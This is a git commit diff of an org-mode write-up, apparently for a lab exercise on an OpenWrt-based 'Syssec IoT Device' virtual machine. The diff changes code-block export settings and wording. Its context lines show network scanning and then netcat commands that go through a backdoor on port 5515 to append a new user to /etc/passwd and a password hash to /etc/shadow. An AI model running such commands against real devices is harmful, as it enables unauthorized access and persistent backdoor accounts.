Some small fixes to improve readability
parent
e9d1b989ee
commit
9507504b2f
18
writeup.org
18
writeup.org
|
@ -4,7 +4,7 @@
|
|||
|
||||
* Vulnerabilty Analysis
|
||||
Given files:
|
||||
#+begin_src sh :results output :exports results :cache yes
|
||||
#+begin_src sh :results output :exports both :cache yes
|
||||
ls ./data/ -lA
|
||||
#+end_src
|
||||
|
||||
|
@ -15,7 +15,7 @@
|
|||
: -rw-r--r-- 1 tuan tuan 9778176 Jun 29 13:33 Sysssec IoT Device.ova
|
||||
|
||||
- ~passwords.txt~: Password list for brute forcing
|
||||
#+begin_src sh :results output :exports results :cache yes
|
||||
#+begin_src sh :results output :exports both :cache yes
|
||||
file ./data/passwords.txt
|
||||
#+end_src
|
||||
|
||||
|
@ -23,7 +23,7 @@
|
|||
: ./data/passwords.txt: ASCII text
|
||||
|
||||
- ~Syssec IoT Device.bin~: Firmware binary of target for static analysis
|
||||
#+begin_src sh :results output :exports results :cache yes
|
||||
#+begin_src sh :results output :exports both :cache yes
|
||||
file ./data/Syssec\ IoT\ Device.bin
|
||||
#+end_src
|
||||
|
||||
|
@ -31,7 +31,7 @@
|
|||
: ./data/Syssec IoT Device.bin: firmware 4300 v1 OpenWrt r16916-7f946a880a, 8126464 bytes or less, at 0x200 2054221 bytes , at 0x1f5a50 2813038 bytes
|
||||
|
||||
- ~Sysssec IoT Device.ova~: Virtual Box image of target for dynamic analysis
|
||||
#+begin_src sh :results output :exports results :cache yes
|
||||
#+begin_src sh :results output :exports both :cache yes
|
||||
file ./data/Sysssec\ IoT\ Device.ova
|
||||
#+end_src
|
||||
|
||||
|
@ -64,7 +64,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
|||
To do this I had to add a network interface on the Virtual Box management interface.
|
||||
|
||||
After doing that I got the necessary network interface.
|
||||
#+begin_src sh :results output :exports results :cache yes
|
||||
#+begin_src sh :results output :exports both :cache yes
|
||||
ifconfig vboxnet0
|
||||
#+end_src
|
||||
|
||||
|
@ -80,7 +80,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
|||
:
|
||||
|
||||
Afterwards an arpscan was possible:
|
||||
#+begin_src sh :results output :exports results :cache yes :dir /sudo::. :async
|
||||
#+begin_src sh :results output :exports both :cache yes :dir /sudo::. :async
|
||||
arp-scan --interface vboxnet0 --local
|
||||
#+end_src
|
||||
|
||||
|
@ -101,7 +101,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
|||
Scanning both devices with nmap shows, that ~192.168.56.100~ doesn't have open ports, so it doesnt seem to be our target device.
|
||||
|
||||
Here I simply create a variable for our targets IP-address, so we don't have to remember it and enter it manually.
|
||||
#+begin_src sh :exports none :cache yes
|
||||
#+begin_src sh :exports both :cache yes
|
||||
TARGET=192.168.56.101
|
||||
echo $TARGET
|
||||
#+end_src
|
||||
|
@ -109,7 +109,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
|||
#+RESULTS[e651e12124dbd06fdedd668151d35ece3ac2dd42]:
|
||||
: 192.168.56.101
|
||||
|
||||
~192.168.56.101~ returns the following nmap scan:
|
||||
nmap on ~192.168.56.101~ returns the following result:
|
||||
#+begin_src sh :results output :exports both :cache yes :eval query :var TARGET="192.168.56.101" :async
|
||||
nmap $TARGET -p-
|
||||
#+end_src
|
||||
|
@ -231,7 +231,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
|||
|
||||
With the backdoor detected on port ~5515~ we can netcat onto it and get a shell.
|
||||
|
||||
To add the user =tuan= and with the password =password= we executed the following code snippets:
|
||||
To add the user =tuan= with the password =password= we executed the following code snippets:
|
||||
#+begin_src sh :results output :exports code :cache yes :var TARGET="192.168.56.101" :async
|
||||
echo "echo tuan:x:1001:1001::/root:/bin/ash >> /etc/passwd;exit" | nc -nv $TARGET 5515
|
||||
echo 'echo tuan:\$1\$123456\$qqQvjw0PqIk7otmzNsUIN0:18145:0:99999:7::: >> /etc/shadow;exit' | nc -nv $TARGET 5515
|
||||
|
|
Loading…
Reference in New Issue